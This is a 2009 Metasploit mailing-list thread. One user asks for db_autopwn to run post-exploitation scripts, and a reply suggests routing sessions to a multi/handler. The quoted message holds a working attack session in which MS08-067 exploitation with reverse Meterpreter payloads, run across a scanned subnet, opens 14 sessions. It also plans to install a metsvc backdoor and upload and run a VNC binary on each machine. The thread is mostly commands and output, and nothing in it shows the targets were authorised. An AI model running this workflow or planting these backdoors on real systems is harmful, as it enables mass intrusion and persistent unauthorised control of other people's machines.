Metasploit mailing list archives
Re: Suggestion for db_autopwn
From: Terrence <secretpackets () gmail com>
Date: Mon, 7 Dec 2009 16:59:04 -0500
Can't you just reverse them to another address running multi/handler? Set your auto script in the multi handler. I know the autorun in multi/handler works like a champ.

On 12/07/2009, David Guimaraes <skysbsb () gmail com> wrote:
I don't know if this already exists, but I want to be able to run an automatic script when I was able to exploit some machine with db_autopwn, because I have to do this (post-exploitation) manually after the exploitation. I have a situation with 14 machines/sessions opened after the db_autopwn runs, and I want to execute a script like this in the 14 sessions.

metsvc (post exploitation bd)
uploadexec -e lv.exe (bind/execute vnc)

Even setting the AutoRunScript to execute a file with these cmds does not work.

root@skys-laptop:/pentest/exploits/framework3# ./msfconsole -rresourcers/lanhouse.cfg

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 458 exploits - 221 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7744 updated today (2009.12.07)

resource> use exploit/windows/smb/ms08_067_netapi
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 10.1.1.103
LHOST => 10.1.1.103
resource> set AutoRunScript multiscript -s /pentest/exploits/framework3/ar.txt
AutoRunScript => multiscript -s /pentest/exploits/framework3/ar.txt
resource> set ExitOnSession false
ExitOnSession => false
resource> db_destroy teste
[*] Deleting teste...
resource> db_create teste
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: teste
resource> db_nmap -n -p 445 10.1.1.2-254 -T5
Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-07 19:08 BRST
...
Nmap done: 253 IP addresses (18 hosts up) scanned in 4.64 seconds
resource> db_autopwn -b -m ms08_067_netapi -p -e
[*] (1/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.19:445...
[*] (2/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.14:445...
[*] (3/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.4:445...
[*] (4/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.11:445...
[*] (5/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.9:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 1 opened (10.1.1.56:50012 -> 10.1.1.19:32145)
[*] Meterpreter session 2 opened (10.1.1.56:54158 -> 10.1.1.11:13307)
[*] Meterpreter session 3 opened (10.1.1.56:44616 -> 10.1.1.4:11042)
[*] Meterpreter session 4 opened (10.1.1.56:40018 -> 10.1.1.14:10421)
[*] (6/16 [4 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.10:445...
[*] Meterpreter session 5 opened (10.1.1.56:57958 -> 10.1.1.9:6209)
[*] (7/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.12:445...
[*] (8/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.5:445...
[*] Job limit reached, waiting on modules to finish...
[*] (9/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.7:445...
[*] (10/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.6:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 6 opened (10.1.1.56:54945 -> 10.1.1.5:22232)
[*] (11/16 [6 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.51:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 7 opened (10.1.1.56:36052 -> 10.1.1.6:25321)
[*] Meterpreter session 8 opened (10.1.1.56:47654 -> 10.1.1.10:26463)
[*] Meterpreter session 9 opened (10.1.1.56:58837 -> 10.1.1.7:22313)
[*] (12/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.8:445...
[*] (13/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.20:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 10 opened (10.1.1.56:44769 -> 10.1.1.12:13791)
[*] (14/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.17:445...
[*] Job limit reached, waiting on modules to finish...
[*] (15/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.3:445...
[*] (16/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.2:445...
[*] (16/16 [10 sessions]): Waiting on 5 launched modules to finish execution...
[*] Meterpreter session 11 opened (10.1.1.56:43583 -> 10.1.1.20:7354)
[*] (16/16 [11 sessions]): Waiting on 5 launched modules to finish execution...
[*] Meterpreter session 12 opened (10.1.1.56:54405 -> 10.1.1.17:6410)
[*] Meterpreter session 13 opened (10.1.1.56:40651 -> 10.1.1.8:8901)
[*] Meterpreter session 14 opened (10.1.1.56:47355 -> 10.1.1.3:21465)
[*] (16/16 [14 sessions]): Waiting on 1 launched modules to finish execution...

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.1.1.56:50012 -> 10.1.1.19:32145
  2   Meterpreter  10.1.1.56:54158 -> 10.1.1.11:13307
  3   Meterpreter  10.1.1.56:44616 -> 10.1.1.4:11042
  4   Meterpreter  10.1.1.56:40018 -> 10.1.1.14:10421
  5   Meterpreter  10.1.1.56:57958 -> 10.1.1.9:6209
  6   Meterpreter  10.1.1.56:54945 -> 10.1.1.5:22232
  7   Meterpreter  10.1.1.56:36052 -> 10.1.1.6:25321
  8   Meterpreter  10.1.1.56:47654 -> 10.1.1.10:26463
  9   Meterpreter  10.1.1.56:58837 -> 10.1.1.7:22313
  10  Meterpreter  10.1.1.56:44769 -> 10.1.1.12:13791
  11  Meterpreter  10.1.1.56:43583 -> 10.1.1.20:7354
  12  Meterpreter  10.1.1.56:54405 -> 10.1.1.17:6410
  13  Meterpreter  10.1.1.56:40651 -> 10.1.1.8:8901
  14  Meterpreter  10.1.1.56:47355 -> 10.1.1.3:21465

Making db_autopwn execute the AutoRunScript parameter after successful exploitation will help me a lot.

--
David Gomes Guimarães

--
Terrence Gareau
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework